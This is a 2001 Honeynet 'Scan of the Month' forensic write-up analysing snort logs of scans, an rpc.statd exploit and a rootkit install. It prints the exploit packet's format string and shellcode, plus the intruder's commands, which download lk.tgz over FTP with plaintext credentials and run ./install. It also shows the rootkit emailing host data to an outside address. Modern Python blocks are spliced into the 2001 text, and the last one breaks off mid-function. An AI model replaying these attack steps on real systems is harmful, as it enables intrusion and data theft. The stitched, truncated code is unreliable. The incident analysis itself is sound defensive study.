Project Honeynet, Scan of the month - September (SCAN 18)
Analysis and Answers

Date:   20.09.2001
Author: Arndt Lueckerath

-------------------------------------------------------------------------------
Abstract
-------------------------------------------------------------------------------

This document gives an analysis of a snort log file which recorded various
port scans and a break-in to a Linux system that was compromised by an
intruder using the rpc.statd exploit (BUGTRAQ ID 1480).

-------------------------------------------------------------------------------
Foreword
-------------------------------------------------------------------------------

All local shell commands are prefixed with a "#"-sign.
Comments and explanations inside a log file are prefixed with a ">"-sign.
Command output is shown as is.

I tried my best to reduce the command output to the amount of data that is
needed for a general understanding and for proving my conclusions.

All timestamps, unless otherwise stated, are taken from the IDS log file.

Tools used while analysing:

  snort, by Martin Roesch, http://www.snort.org/
  tcpflow, by Jeremy Elson, http://www.circlemud.org/~jelson/

-------------------------------------------------------------------------------
Getting prepared
-------------------------------------------------------------------------------

Fetch the log file from the honeynet web server using wget.

# wget http://project.honeynet.org/scans/scan18/snort-0315@0005.log.tar.gz

After this verify the md5-checksum against the one provided by honeynet.
By doing this, we can see that the checksum matches, so we can continue.
# md5sum snort-0315\@0005.log.tar.gz
9b68e8ffade74bbf5ce0296a1977d111  snort-0315@0005.log.tar.gz

-------------------------------------------------------------------------------
Summary of the Analysis
-------------------------------------------------------------------------------

In order to get a first impression of the attack as a whole I browsed through
the file using snort to find out the important steps from which the blackhats
built up their attacks.

# snort -Xv -r snort-0315\@0005.log | less

While I was browsing I noticed some important phases which should help us
later to answer the questions. To draw a clearer picture I can divide those
periods into three successive main phases:

1) scan phase
   purpose: find a vulnerable target system
   various scans against the network 172.16.1.0/24

2) intrusion phase
   purpose: break into the system and gain privileged access
   The exploit which the attacker used was the rpc.statd exploit
   (bugtraq id 1480). See the following URLs for further information:
   MITRE CVE:     http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0666
   SECURITYFOCUS: http://www.securityfocus.com/bid/1480

3) safeguard phase
   purpose: install backdoors, hide and hack
   The safeguard phase is in fact the period from which we get lots of
   information about the blackhats themselves.

After browsing I used tcpflow to extract the single tcp-data streams out of
the log file for easy reading (see also the answer to the bonus question).

# tcpflow -r snort-0315\@0005.log

-------------------------------------------------------------------------------
In-depth analysis
-------------------------------------------------------------------------------

1) scan phase

Now let's have a deeper look at the various scans and try to find out what we
can conclude from the gathered information.

The scans came from three different systems.
A scan overview:

1st scan at 11:33 from 203.111.78.182 (baccess-01-182.magna.com.au)
   WHOIS:     Davnet Telecommunications, Sydney, Australia
              (Australian ISP, see http://www.davnet.com.au/)
   TARGET:    172.16.1.102-108, Port 111
   SCAN TYPE: tcp-connect()

2nd scan at 15:35 from 211.180.229.190
   WHOIS:     Ice Core, Seoul, Korea
              (customer of Korean ISP BORANET, see http://www.bora.net/eng/)
   TARGET:    172.16.1.101-108, Port 515
              telnet attempt against 172.16.1.103
   SCAN TYPE: tcp-connect()

3rd scan at 03:21 from 211.185.125.124
   WHOIS:     Kyongsan Purim Elementary School, South-Korea, Kyongsan
              (nearby Taegu)
   TARGET:    172.16.1.101-108, Port 111
   SCAN TYPE: tcp-connect()


1st scan at 11:33 from 203.111.78.182

The 1st scan was launched from the system 203.111.78.182 (DAVNET, Sydney)
against all hosts in the IP address range 172.16.1.102-108. They scanned for
port 111, which is sunrpc. What is interesting is that the system
172.16.1.103 replied to the scan, but our blackhat seemed not to be
interested in this fact. The scan signature is typical for a simple
tcp-connect scan, because the complete 3-way handshake of a TCP connection
establishment was negotiated.

--- snort log ----
03/15-11:33:23.616029 203.111.78.182:2656 -> 172.16.1.102:111
TCP TTL:45 TOS:0x0 ID:37712 IpLen:20 DgmLen:60 DF
******S* Seq: 0x61E38166  Ack: 0x0  Win: 0x7D78  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 1425735 0 NOP WS: 0
.
. (complete log see file scan18-var.txt)
.
--- end snort log ----


2nd scan at 15:35 from 211.180.229.190

The second scan was initiated from the system 211.180.229.190 (Ice Core,
Seoul) against all hosts in the IP address range 172.16.1.101-108. This time
they scanned for port 515, which is printer. Again the box at 172.16.1.103
answered the scan. The scan type is, as in the 1st scan, simple tcp-connect.
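To make the tcp-connect() signature explicit, here is an added example (my own code, not part of the challenge or of snort) that walks records in the "snort -v" text format shown above, groups SYN probes by scanning source and destination port, and reports which targets answered and whether the scanner completed the handshake with them. The sample records are constructed in that format and reuse the addresses of the 1st scan; the sequence numbers and IDs are invented.

```python
import re
from collections import defaultdict

# Constructed records in "snort -v" format (not taken from the challenge log),
# reusing the addresses of the 1st scan: three hosts are probed on port 111,
# only 172.16.1.103 answers, and the scanner completes the handshake with it.
SAMPLE_LOG = """\
03/15-11:33:23.616029 203.111.78.182:2656 -> 172.16.1.102:111
TCP TTL:45 TOS:0x0 ID:37712 IpLen:20 DgmLen:60 DF
******S* Seq: 0x61E38166  Ack: 0x0  Win: 0x7D78  TcpLen: 40

03/15-11:33:23.640010 203.111.78.182:2657 -> 172.16.1.103:111
TCP TTL:45 TOS:0x0 ID:37713 IpLen:20 DgmLen:60 DF
******S* Seq: 0x61E40000  Ack: 0x0  Win: 0x7D78  TcpLen: 40

03/15-11:33:23.641500 172.16.1.103:111 -> 203.111.78.182:2657
TCP TTL:254 TOS:0x0 ID:24000 IpLen:20 DgmLen:64 DF
***A**S* Seq: 0xE4000000  Ack: 0x61E40001  Win: 0x2798  TcpLen: 44

03/15-11:33:23.900000 203.111.78.182:2657 -> 172.16.1.103:111
TCP TTL:45 TOS:0x0 ID:37714 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x61E40001  Ack: 0xE4000001  Win: 0x7D78  TcpLen: 32

03/15-11:33:23.950000 203.111.78.182:2658 -> 172.16.1.104:111
TCP TTL:45 TOS:0x0 ID:37715 IpLen:20 DgmLen:60 DF
******S* Seq: 0x61E50000  Ack: 0x0  Win: 0x7D78  TcpLen: 40
"""

HDR = re.compile(r"^(\S+) (\d+\.\d+\.\d+\.\d+):(\d+) -> (\d+\.\d+\.\d+\.\d+):(\d+)$")
FLAGS = re.compile(r"^([12UAPRSF*]{8}) Seq:")   # snort's 8-char flag field

def parse_records(text):
    """Turn snort -v text into dicts; only the header and the flag line matter here."""
    records, cur = [], None
    for line in text.splitlines():
        m = HDR.match(line)
        if m:
            cur = {"src": m.group(2), "sport": int(m.group(3)),
                   "dst": m.group(4), "dport": int(m.group(5)), "flags": ""}
            records.append(cur)
        elif cur is not None and (m := FLAGS.match(line)):
            cur["flags"] = m.group(1)
    return records

def classify_scans(records, min_targets=3):
    """Group SYN probes by (scanner, destination port) and name the scan type.

    tcp-connect(): every target that sent SYN/ACK also received the final ACK.
    half-open:     targets sent SYN/ACK but the scanner never completed it.
    """
    conns = {}                         # (scanner, sport, target, dport) -> [synack, acked]
    for r in records:
        syn, ack = "S" in r["flags"], "A" in r["flags"]
        if syn and not ack:            # probe from the scanner
            conns[(r["src"], r["sport"], r["dst"], r["dport"])] = [False, False]
        elif syn and ack:              # target answers: the port is open
            st = conns.get((r["dst"], r["dport"], r["src"], r["sport"]))
            if st:
                st[0] = True
        elif ack:                      # third step of the handshake
            st = conns.get((r["src"], r["sport"], r["dst"], r["dport"]))
            if st and st[0]:
                st[1] = True
    per_scan = defaultdict(lambda: [set(), set(), set()])  # targets, answered, completed
    for (src, _, dst, dport), (synack, acked) in conns.items():
        targets, answered, completed = per_scan[(src, dport)]
        targets.add(dst)
        if synack:
            answered.add(dst)
        if acked:
            completed.add(dst)
    report = {}
    for key, (targets, answered, completed) in per_scan.items():
        if len(targets) < min_targets:
            continue                   # a couple of connections are not a sweep
        if answered and answered == completed:
            kind = "tcp-connect()"
        elif answered:
            kind = "half-open (SYN) scan"
        else:
            kind = "unknown (no target answered)"
        report[key] = {"targets": sorted(targets), "answered": sorted(answered), "type": kind}
    return report
```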
--- snort log ----
03/15-15:35:52.282971 211.180.229.190:1558 -> 172.16.1.101:515
TCP TTL:47 TOS:0x0 ID:16156 IpLen:20 DgmLen:60 DF
******S* Seq: 0xFFACC48F  Ack: 0x0  Win: 0x7D78  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 2453897 0 NOP WS: 0
.
. (complete log see file scan18-var.txt)
.
--- end snort log ----

The fact that the system 172.16.1.103 answered the scan was not ignored by
our friend this time. Nearly twenty-five minutes later our curious friend
tried a telnet connect to the machine. The machine, running SunOS 5.7, gave a
login prompt. This was seemingly enough information for our blackhat; no
further action was taken by our friend.

--- snort log ----
03/15-16:08:31.993785 172.16.1.103:23 -> 211.180.229.190:3329
TCP TTL:254 TOS:0x0 ID:19749 IpLen:20 DgmLen:85 DF
***AP*** Seq: 0xB7344323  Ack: 0x7A31B9AF  Win: 0x2798  TcpLen: 32
TCP Options (3) => NOP NOP TS: 627712437 2649850
0x0000: 08 00 20 9C 6B 2D 00 E0 1E 60 70 40 08 00 45 00  .. .k-...`p@..E.
0x0010: 00 55 4D 25 40 00 FE 06 C8 92 AC 10 01 67 D3 B4  .UM%@........g..
0x0020: E5 BE 00 17 0D 01 B7 34 43 23 7A 31 B9 AF 80 18  .......4C#z1....
0x0030: 27 98 02 DE 00 00 01 01 08 0A 25 6A 21 B5 00 28  '.........%j!..(
0x0040: 6E FA FF FE 1F FF FE 23 FF FE 27 FF FE 24 0D 0A  n......#..'..$..
0x0050: 0D 0A 53 75 6E 4F 53 20 35 2E 37 0D 0A 0D 00 0D  ..SunOS 5.7.....
0x0060: 0A 0D 00                                         ...
.
. (complete log see file scan18-var.txt)
.
03/15-16:08:32.289164 172.16.1.103:23 -> 211.180.229.190:3329
TCP TTL:254 TOS:0x0 ID:19750 IpLen:20 DgmLen:68 DF
***AP*** Seq: 0xB7344344  Ack: 0x7A31B9AF  Win: 0x2798  TcpLen: 32
TCP Options (3) => NOP NOP TS: 627712467 2649882
0x0000: 08 00 20 9C 6B 2D 00 E0 1E 60 70 40 08 00 45 00  .. .k-...`p@..E.
0x0010: 00 44 4D 26 40 00 FE 06 C8 A2 AC 10 01 67 D3 B4  .DM&@........g..
0x0020: E5 BE 00 17 0D 01 B7 34 43 44 7A 31 B9 AF 80 18  .......4CDz1....
0x0030: 27 98 E4 D1 00 00 01 01 08 0A 25 6A 21 D3 00 28  '.........%j!..(
0x0040: 6F 1A FF FB 01 FF FB 03 FF FD 01 6C 6F 67 69 6E  o..........login
0x0050: 3A 20                                            :
--- end snort log ----

At 17:06 someone (209.123.128.12) checked the nameserver on the machine
172.16.1.103 by sending a query for www.black-hats.com.

--- snort log ----
03/15-17:06:39.418960 209.123.128.12:4876 -> 172.16.1.103:53
UDP TTL:49 TOS:0x0 ID:27923 IpLen:20 DgmLen:64
Len: 44
0x0000: 00 E0 1E 60 70 40 08 00 20 9C 6B 2D 08 00 45 00  ...`p@.. .k-..E.
0x0010: 00 40 6D 13 00 00 31 11 1D 9B D1 7B 80 0C AC 10  .@m...1....{....
0x0020: 01 67 13 0C 00 35 00 2C 08 39 7E 6D 00 00 00 01  .g...5.,.9~m....
0x0030: 00 00 00 00 00 00 03 77 77 77 0A 42 4C 41 43 4B  .......www.BLACK
0x0040: 2D 48 41 54 53 03 43 4F 4D 00 00 01 00 01        -HATS.COM.....

03/15-17:06:39.425856 172.16.1.103:53 -> 209.123.128.12:4876
UDP TTL:254 TOS:0x0 ID:34927 IpLen:20 DgmLen:112 DF
Len: 92
0x0000: 08 00 20 9C 6B 2D 00 E0 1E 60 70 40 08 00 45 00  .. .k-...`p@..E.
0x0010: 00 70 88 6F 40 00 FE 11 F5 0D AC 10 01 67 D1 7B  .p.o@........g.{
0x0020: 80 0C 00 35 13 0C 00 5C 32 EE 7E 6D 80 80 00 01  ...5...\2.~m....
0x0030: 00 02 00 00 00 00 03 77 77 77 0A 42 4C 41 43 4B  .......www.BLACK
0x0040: 2D 48 41 54 53 03 43 4F 4D 00 00 01 00 01 C0 0C  -HATS.COM.......
0x0050: 00 05 00 01 00 01 51 80 00 14 03 6C 61 62 0A 62  ......Q....lab.b
0x0060: 6C 61 63 6B 2D 68 61 74 73 03 63 6F 6D 00 C0 30  lack-hats.com..0
0x0070: 00 01 00 01 00 01 51 80 00 04 D8 50 47 6A        ......Q....PGj
--- end snort log ----


3rd scan at 03:21 from 211.185.125.124

The scan signature of the 3rd scan is completely different from the other
scans. The scan was targeted against all hosts of the IP address range
172.16.1.101-108. The target port was 111, sunrpc. Interesting is the fact
that the scan was executed several times. Also an important fact: if one
machine answers the scan, the rpc.statd exploit is sent directly to that
system.
We can conclude from this information that this scan was originated by some
kind of script which searches for vulnerable targets.

--- snort log ----
03/16-03:21:23.840485 211.185.125.124:3493 -> 172.16.1.101:111
TCP TTL:43 TOS:0x0 ID:28754 IpLen:20 DgmLen:60 DF
******S* Seq: 0x9B8A127C  Ack: 0x0  Win: 0x7D78  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 23678607 0 NOP WS: 0
.
.
> The system at 172.16.1.108 answered, what fun.
03/16-03:21:23.881889 172.16.1.108:111 -> 211.185.125.124:3500
TCP TTL:63 TOS:0x0 ID:72 IpLen:20 DgmLen:60 DF
***A**S* Seq: 0x5820ADCF  Ack: 0x9B6338C5  Win: 0x7D78  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 2878772 23678607 NOP WS: 0
.
.
> This time the system at 172.16.1.103 also answered on port 111.
> Great luck for our blackhat.
03/16-03:21:23.863680 172.16.1.103:111 -> 211.185.125.124:3495
TCP TTL:254 TOS:0x0 ID:24109 IpLen:20 DgmLen:64 DF
***A**S* Seq: 0xE409173D  Ack: 0x9B6B33C1  Win: 0x2798  TcpLen: 44
TCP Options (9) => NOP NOP TS: 631749790 23678607 NOP WS: 0 NOP
TCP Options => NOP SackOK MSS: 1460
.
.
--- end snort log ----


2) intrusion phase

Our blackhat found two systems which seemed to have sunrpc running. Our
friend will first try to exploit the system at 172.16.1.103, then the system
at 172.16.1.108. The latter exploit will actually result in a break-in by
gaining a shell with root access.

Now let's look at the first exploit. We can see some shellcode and at the end
obviously the command which should get executed after smashing the stack
(/bin/sh).

--- snort log ----
> Send a request to the portmapper
03/16-03:21:24.452051 211.185.125.124:789 -> 172.16.1.103:111
UDP TTL:43 TOS:0x0 ID:29733 IpLen:20 DgmLen:84
Len: 64

> Portmapper answered, communication channel is now open
> at port 32773 (0x8005)
03/16-03:21:24.455402 172.16.1.103:111 -> 211.185.125.124:789
UDP TTL:254 TOS:0x0 ID:24110 IpLen:20 DgmLen:56 DF
Len: 36
.
.
0x0040: 00 00 00 00 80 05                                ......
> do the exploit
03/16-03:21:24.730436 211.185.125.124:790 -> 172.16.1.103:32773
UDP TTL:43 TOS:0x0 ID:29781 IpLen:20 DgmLen:1104
Len: 1084
0x0000: 00 E0 1E 60 70 40 08 00 20 9C 6B 2D 08 00 45 00  ...`p@.. .k-..E.
0x0010: 04 50 74 55 00 00 2B 11 18 9B D3 B9 7D 7C AC 10  .PtU..+.....}|..
0x0020: 01 67 03 16 80 05 04 3C C8 3D 47 F7 9F 63 00 00  .g.....<.=G..c..
0x0030: 00 00 00 00 00 02 00 01 86 B8 00 00 00 01 00 00  ................
0x0040: 00 01 00 00 00 01 00 00 00 20 3A B1 5E E5 00 00  ......... :.^...
0x0050: 00 09 6C 6F 63 61 6C 68 6F 73 74 00 00 00 00 00  ..localhost.....
0x0060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0070: 00 00 00 00 03 E7 18 F7 FF BF 18 F7 FF BF 19 F7  ................
0x0080: FF BF 19 F7 FF BF 1A F7 FF BF 1A F7 FF BF 1B F7  ................
0x0090: FF BF 1B F7 FF BF 25 38 78 25 38 78 25 38 78 25  ......%8x%8x%8x%
0x00A0: 38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38  8x%8x%8x%8x%8x%8
0x00B0: 78 25 32 33 36 78 25 6E 25 31 33 37 78 25 6E 25  x%236x%n%137x%n%
0x00C0: 31 30 78 25 6E 25 31 39 32 78 25 6E 90 90 90 90  10x%n%192x%n....
.
.
0x0430: 3F CD 80 C7 06 2F 62 69 6E C7 46 04 2F 73 68 41  ?..../bin.F./shA
0x0440: 30 C0 88 46 07 89 76 0C 8D 56 10 8D 4E 0C 89 F3  0..F..v..V..N...
0x0450: B0 0B CD 80 B0 01 CD 80 E8 7F FF FF FF 00        ..............

> 172.16.1.103 answered "normally", nothing happened
03/16-03:21:24.735452 172.16.1.103:32773 -> 211.185.125.124:790
UDP TTL:254 TOS:0x0 ID:24111 IpLen:20 DgmLen:60 DF
Len: 40

> Now run the exploit against 172.16.1.108.
> Send a request to the portmapper
03/16-03:21:24.995382 211.185.125.124:790 -> 172.16.1.108:111
UDP TTL:43 TOS:0x0 ID:29784 IpLen:20 DgmLen:84
Len: 64

> Portmapper answered, communication channel is now open
> at port 931 (0x3a3)
03/16-03:21:25.042649 172.16.1.108:111 -> 211.185.125.124:790
UDP TTL:63 TOS:0x0 ID:73 IpLen:20 DgmLen:56
Len: 36
.
.
0x0040: 00 00 00 00 03 A3                                ......
> now do the exploit (the exploit packet gets sent three times, with
> different packet IDs)
03/16-03:21:25.326967 211.185.125.124:791 -> 172.16.1.108:931
UDP TTL:43 TOS:0x0 ID:29787 IpLen:20 DgmLen:1104
Len: 1084
.
.
0x0080: FF BF 19 F7 FF BF 1A F7 FF BF 1A F7 FF BF 1B F7  ................
0x0090: FF BF 1B F7 FF BF 25 38 78 25 38 78 25 38 78 25  ......%8x%8x%8x%
0x00A0: 38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38  8x%8x%8x%8x%8x%8
0x00B0: 78 25 32 33 36 78 25 6E 25 31 33 37 78 25 6E 25  x%236x%n%137x%n%
0x00C0: 31 30 78 25 6E 25 31 39 32 78 25 6E 90 90 90 90  10x%n%192x%n....
0x00D0: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
.
.
0x0420: C3 31 C9 B0 3F CD 80 FE C1 B0 3F CD 80 FE C1 B0  .1..?.....?.....
0x0430: 3F CD 80 C7 06 2F 62 69 6E C7 46 04 2F 73 68 41  ?..../bin.F./shA
0x0440: 30 C0 88 46 07 89 76 0C 8D 56 10 8D 4E 0C 89 F3  0..F..v..V..N...
0x0450: B0 0B CD 80 B0 01 CD 80 E8 7F FF FF FF 00        ..............
.
.
03/16-03:21:27.324233 211.185.125.124:791 -> 172.16.1.108:931
UDP TTL:43 TOS:0x0 ID:30705 IpLen:20 DgmLen:1104
Len: 1084
.
.
03/16-03:21:29.303241 211.185.125.124:791 -> 172.16.1.108:931
UDP TTL:43 TOS:0x0 ID:30708 IpLen:20 DgmLen:1104
Len: 1084
.
.

> Try to connect to port 39168 (the standard port used by the exploit), to
> see if the shell is running.
> 3-way handshake
03/16-03:21:36.312515 211.185.125.124:4450 -> 172.16.1.108:39168
TCP TTL:43 TOS:0x0 ID:31657 IpLen:20 DgmLen:60 DF
******S* Seq: 0x9C6D2BFE  Ack: 0x0  Win: 0x7D78  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 23679855 0 NOP WS: 0

03/16-03:21:36.313896 172.16.1.108:39168 -> 211.185.125.124:4450
TCP TTL:63 TOS:0x0 ID:75 IpLen:20 DgmLen:60 DF
***A**S* Seq: 0x59606332  Ack: 0x9C6D2BFF  Win: 0x7D78  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 2880015 23679855 NOP
TCP Options => WS: 0

03/16-03:21:36.538332 211.185.125.124:4450 -> 172.16.1.108:39168
TCP TTL:43 TOS:0x0 ID:31659 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x9C6D2BFF  Ack: 0x59606333  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 23679878 2880015

> Success! Now he has a shell running on port 39168!
> cd to /, see what system I am on and look under which
> effective uid my shell is running.
03/16-03:21:36.539731 211.185.125.124:4450 -> 172.16.1.108:39168
TCP TTL:43 TOS:0x0 ID:31660 IpLen:20 DgmLen:71 DF
***AP*** Seq: 0x9C6D2BFF  Ack: 0x59606333  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 23679878 2880015
0x0000: 00 E0 1E 60 70 40 08 00 20 9C 6B 2D 08 00 45 00  ...`p@.. .k-..E.
0x0010: 00 47 7B AC 40 00 2B 06 D5 52 D3 B9 7D 7C AC 10  .G{.@.+..R..}|..
0x0020: 01 6C 11 62 99 00 9C 6D 2B FF 59 60 63 33 80 18  .l.b...m+.Y`c3..
0x0030: 7D 78 7C 54 00 00 01 01 08 0A 01 69 53 86 00 2B  }x|T.......iS..+
0x0040: F2 0F 63 64 20 2F 3B 20 75 6E 61 6D 65 20 2D 61  ..cd /; uname -a
0x0050: 3B 20 69 64 3B                                   ; id;
--- end snort log ----


3) safeguard phase

After the blackhat gained root access by connecting to the shell on port
39168 he transferred a rootkit to the machine and installed it on the
system. This is the command sequence that was executed in the shell session:

--- tcpflow file 211.185.125.124.04450-172.016.001.108.39168 ---
cd /; uname -a; id;
ftp -v ftp.home.ro
soane
i2ttgcj1d
get lk.tgz
bye
tar -zxvf lk.tgz
cd last
./install
--- end tcpflow file ---

This is what comes back from the shell.
We can see that the install script outputs a message in Romanian. Also we see
that our blackhat has a member account at home.ro, a Romanian ISP. Is our
friend of Romanian nationality?

--- tcpflow file 172.016.001.108.39168-211.185.125.124.04450 ---
(for complete log see attached file scan18-var.txt)
Linux asdf1 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown
uid=0(root) gid=0(root)
Connected to ftp.home.ro.
220-
220-
220-                   H O M E . R O
220-
220-       This server is for HOME.RO members only.
220-       Go to http://www.home.ro/ to register.
220-
220-       No anonymous access allowed.
220-
220-
220 ProFTPD 1.2.0rc3 Server (HOME.RO Members FTP) [193.231.236.41]
Name (ftp.home.ro:root): 331 Password required for soane.
Password:230 User soane logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
local: lk.tgz remote: lk.tgz
.
.
.
********* Instalarea Rootkitului A Pornit La Drum *********
********* Mircea SUGI PULA ********************************
********* Multumiri La Toti Care M-Au Ajutat **************
********* Lemme Give You A Tip : **************************
********* Ignore everything, call your freedom ************
********* Scream & swear as much as you can ***************
********* Cuz anyway nobody will hear you and no one will *
********* Care about you **********************************
.
.
.
--- end tcpflow file ---

This mail was sent by the rootkit install script. Did our blackhat notice it?
:)

--- tcpflow file 172.016.001.108.01028-216.136.129.014.00025 ---
EHLO asdf1
MAIL From: SIZE=836
RCPT To:
DATA
Received: (from root@localhost)
        by asdf1 (8.9.3/8.9.3) id TAA00952
        for bidi_damm@yahoo.com; Thu, 15 Mar 2001 19:46:05 -0600
Date: Thu, 15 Mar 2001 19:46:05 -0600
From: root
Message-Id: <200103160146.TAA00952@asdf1>
To: bidi_damm@yahoo.com
Subject: roote

 * Info : Linux asdf1 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown
 * Hostname : asdf1
 * IfConfig : inet addr:127.0.0.1  Bcast:127.255.255.255  Mask:255.0.0.0
              inet addr:172.16.1.108  Bcast:172.16.1.255  Mask:255.255.255.0
 * Uptime : 7:45pm  up 8:23,  0 users,  load average: 0.00, 0.00, 0.00
 * Cpu Vendor ID : vendor_id : GenuineIntel
 * Cpu Model : model : 4
               model name : Pentium MMX
 * Cpu Speed: cpu MHz : 200.457171
 * Bogomips: bogomips : 399.77
 * Spatiu Liber:
Filesystem    Size  Used  Avail  Use%  Mounted on
/dev/hda8     251M   33M   205M   14%  /
/dev/hda1      23M  2.4M    19M   11%  /boot
/dev/hda6     1.6G  2.1M   1.5G    0%  /home
/dev/hda5     1.6G  367M   1.2G   23%  /usr
/dev/hda7     251M  5.3M   232M    2%  /var
.
QUIT
--- end tcpflow file ---

-------------------------------------------------------------------------------
Answers to the questions
-------------------------------------------------------------------------------

1. What modifications did they make to the break in process to both automate
   and make the process faster?

All blackhats used a port scanner to locate a vulnerable system. The 3rd scan
in fact seemed to be executed by a script, something like a combination of a
port scanner and the actual exploit program, because as soon as an open port
is detected by the scan process, the exploit is sent to the target system.
I want to stress the fact that with such a method one can easily automate
the break-in process: the exploit can be tried against a large number of
systems without losing much time.

2. What system/country did the badguys come in from?

The first scan was initiated from a system (203.111.78.182) in Australia.
The IP address belongs to the large address space registered to an
Australian ISP named Davnet in Sydney (see http://www.davnet.com.au/).

The second and third systems are both located in Korea. The former system
with the IP address 211.180.229.190 belongs to a small address space (16
addresses) registered to a research center named Ice Core in South-Korea,
Seoul, district Kangnam-gu, which is a customer of the Korean ISP BORANET
(see http://www.bora.net/eng/). We can assume that this system is a machine
for doing some research work.

The latter system (211.185.125.124) is likely located in Kyongsan, nearby
Taegu in South Korea, because the IP address belongs to the address space
registered to an elementary school (see http://whois.nic.or.kr/).

3. What nationality are the badguys, and how were you able to determine this?

The 1st scan came from an IP address of an Australian ISP, so let us presume
that this hacker lives somewhere in Australia and dials into the Internet
using the DAVNET ISP service - a simple, straightforward theory. Speaking
against this theory, this system could be a hacked system of an unsuspecting
user connected to DAVNET, whose machine was used by our blackhat as a
stepping stone to target other systems. If we assume so, we have no idea of
the hacker's nationality.

The 2nd system belongs to the research center Ice Core. My theory in this
case is that this system has been hacked by a blackhat in order to get a nice
platform from which to operate anonymously. Often such systems consist of
standard installations and are under nearly no supervision, which makes them
an easy target for even inexperienced hackers. So in this case I have really
no idea which nationality our friend is. Naturally it could also be the case
that a member of Ice Core who suffered from boredom initiated the scan.
However, we may never know.

Now the theory for the 3rd, most interesting scan.
As exposed in my analysis, the blackhat installed a rootkit on the affected
system. The fact that the rootkit's messages are in Romanian, and the fact
that our blackhat owns a member account at a Romanian ISP, lead to the
assumption that our blackhat is apparently able to understand this language.
So we have good reason to believe that our blackhat is of Romanian
nationality. However, on the other hand, it could be the case that we are
dealing with an extraordinarily smart person. Supposing so, this would mean
that the usage of a Romanian ISP account and the mentioned rootkit with the
Romanian message is just another tactic to hide the true identity. If we
assume that this is the case, nobody knows what the true nationality is.

4. What do the answers to questions #1 and #2 tell us about the tactics the
   badguys are using?

We can conclude that the badguys use hacked systems from which they actually
operate almost anonymously - a common tactic used by hackers, even if not the
golden rule number one in a hacker's bible. With this tactic the badguys are
able to hide their true identity and locality very effectively. In our case
we can likely suppose that our attacker is of Romanian nationality, as shown
above in question 3, and also that maybe he lives there.

What we can also conclude from the occurrence of the various scans is that
scanning is a common method used by the blackhat community in order to look
for hosts running vulnerable services. Automating and scripting attacks is
also a technique which the badguys use, as we can see in this case.

5. What did you learn from this challenge?

The fact that a system from an elementary school and a system from a research
center were used for launching an attack leads to the direct assumption that
those systems, which belong to public or academic institutions, are not being
maintained well.
Even worse, it is often the case that those institutions have small financial
budgets and therefore cannot afford competent personnel to maintain the
computer systems.

I remember a friend who studied computer science at the university. As a
student of the university you get an account on a Unix system. Two years
after he finished studying he tried to log on to the system, using the
account which he used in his study time - the account was still active.

If we think of this case and consider that weak passwords are used all over
the world, despite all security recommendations and warnings, we need not
wonder why such systems are a hacker's paradise: it is really not difficult
for a blackhat to crack a username and password by starting a dictionary
attack (guessing usernames and passwords with the help of a computer) against
such systems.

Certainly improving my English (sorry for the German style) and Romanian
skills.

6. How long did this challenge take you?

Get an overview: 10 minutes
Research:        1-2 hours
Write up:        8 hours

Bonus Question: Can you recover the blackhat's rootkit from the Snort binary
log file? If so, how?

In order to reassemble TCP streams we only need to find the first data packet
of a specific TCP stream after the 3-way handshake. Starting with the first
sequence number upwards we have to traverse the list of sequence numbers
until the stream ends. The data of each packet needs to be written to a file.

The tool tcpflow by Jeremy Elson (http://www.circlemud.org/~jelson) does
exactly what we need. By looking at the sequence numbers the program writes
the contents of the packets in the correct order to a file. The program can
read log files in pcap format.

If we run the program against the snort log file we get a file named
193.231.236.041.00020-172.016.001.108.01027. This is the stream of the
FTP-DATA session, the session in which the rootkit was transferred to the
Linux box.
If we rename the file to lk.tgz we can extract the contents of the archive
(before I forget to mention: do not run ./install, otherwise some lucky
blackhat gets a nice mail from your system :)).

# tar zxpvf lk.tgz
last/
last/ssh
last/pidfile
last/install
last/linsniffer
last/cleaner
last/inetd.conf
last/lsattr
last/services
last/sense
last/ssh_config
last/ssh_host_key
last/ssh_host_key.pub
last/ssh_random_seed
last/sshd_config
last/sl2
last/last.cgi
last/ps
last/netstat
last/ifconfig
last/top
last/logclear
last/s
last/mkxfs
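As an added example for the bonus answer (my own code, not tcpflow's), the following Python does the reassembly described above on a pcap image: data segments are keyed by sequence number, written out in ascending order with retransmissions and overlaps dropped, and named with tcpflow's zero-padded convention. The pcap, the FTP-DATA segments and the archive bytes are constructed inline (the addresses are the ones from the challenge, the bytes are invented); a real capture would be read with open(path, "rb").read(), and checking for the gzip magic 1f 8b before renaming a stream to lk.tgz confirms that the right stream was picked.

```python
import struct
from collections import defaultdict

def _frame(src, sport, dst, dport, seq, flags, payload=b""):
    """Build a minimal Ethernet/IPv4/TCP frame; checksums stay zero (not verified here)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, flags, 8192, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload), 1, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp + payload

def make_pcap(frames):
    """Serialise frames as a little-endian pcap image, link type 1 (Ethernet)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1000 + i, 0, len(f), len(f)) + f
    return out

def flow_name(src, sport, dst, dport):
    """tcpflow's file naming: zero-padded octets and ports (src-dst direction)."""
    def pad(ip, port):
        return ".".join("%03d" % b for b in ip) + ".%05d" % port
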